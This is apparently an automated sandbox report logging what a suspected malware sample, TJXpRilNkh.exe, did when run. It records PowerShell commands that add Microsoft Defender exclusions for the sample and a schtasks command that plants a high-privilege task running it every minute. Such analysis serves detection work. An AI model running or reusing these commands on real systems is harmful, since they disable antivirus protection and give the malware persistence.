                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: TJXpRilNkh.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile read: C:\Users\user\Desktop\TJXpRilNkh.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\TJXpRilNkh.exe "C:\Users\user\Desktop\TJXpRilNkh.exe"
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TJXpRilNkh.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5236 -s 2964
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\TJXpRilNkh.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: TJXpRilNkh.lnk.0.drLNK file: ..\..\..\..\..\TJXpRilNkh.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: TJXpRilNkh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: TJXpRilNkh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: .pdb| source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbw source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdby source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Configuration.pdb source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: TJXpRilNkh.exe, 00000000.00000002.3564900844.000000001C0E9000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.pdbMZ source: WER443E.tmp.dmp.19.dr
                  Source: Binary string: System.Xml.pdb source: WER443E.tmp.dmp.19.dr
